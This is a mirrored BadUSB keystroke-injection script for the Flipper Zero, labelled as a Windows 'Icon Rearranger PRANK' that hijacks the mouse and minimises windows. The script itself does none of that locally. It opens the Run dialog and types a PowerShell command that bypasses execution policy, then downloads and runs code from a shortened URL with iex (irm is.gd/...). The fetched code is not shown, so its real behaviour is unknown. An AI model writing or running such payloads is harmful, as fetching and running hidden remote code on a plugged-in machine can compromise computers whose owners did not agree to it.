mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-04-28 13:53:05 -07:00
14 lines
362 B
Plaintext
14 lines
362 B
Plaintext
|
|
REM Title: Icon Rearranger PRANK
|
|
REM Author: @beigeworm
|
|
REM Description: Hijacks the mouse and continuously minimizees all windows and drags around the desktop attempting to rearrange icons
|
|
REM Target: Windows 10 and 11
|
|
|
|
DEFAULT_DELAY 100
|
|
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C $randomVar = 'var'; iex (irm is.gd/lh92CZ)
|
|
ENTER
|